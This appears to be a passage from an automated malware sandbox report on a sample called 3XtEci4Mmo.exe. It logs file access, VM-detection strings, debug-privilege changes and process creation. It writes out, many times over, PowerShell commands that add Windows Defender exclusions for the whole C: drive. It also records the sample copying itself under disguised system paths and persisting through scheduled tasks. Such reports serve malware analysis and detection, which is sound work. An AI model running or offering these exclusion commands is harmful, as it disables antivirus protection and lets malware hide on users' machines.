                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1897117600.000000001B600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1897117600.000000001B600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeProcess token adjusted: Debug
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeProcess token adjusted: Debug
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeProcess token adjusted: Debug
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeQueries volume information: C:\Users\user\Desktop\3XtEci4Mmo.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
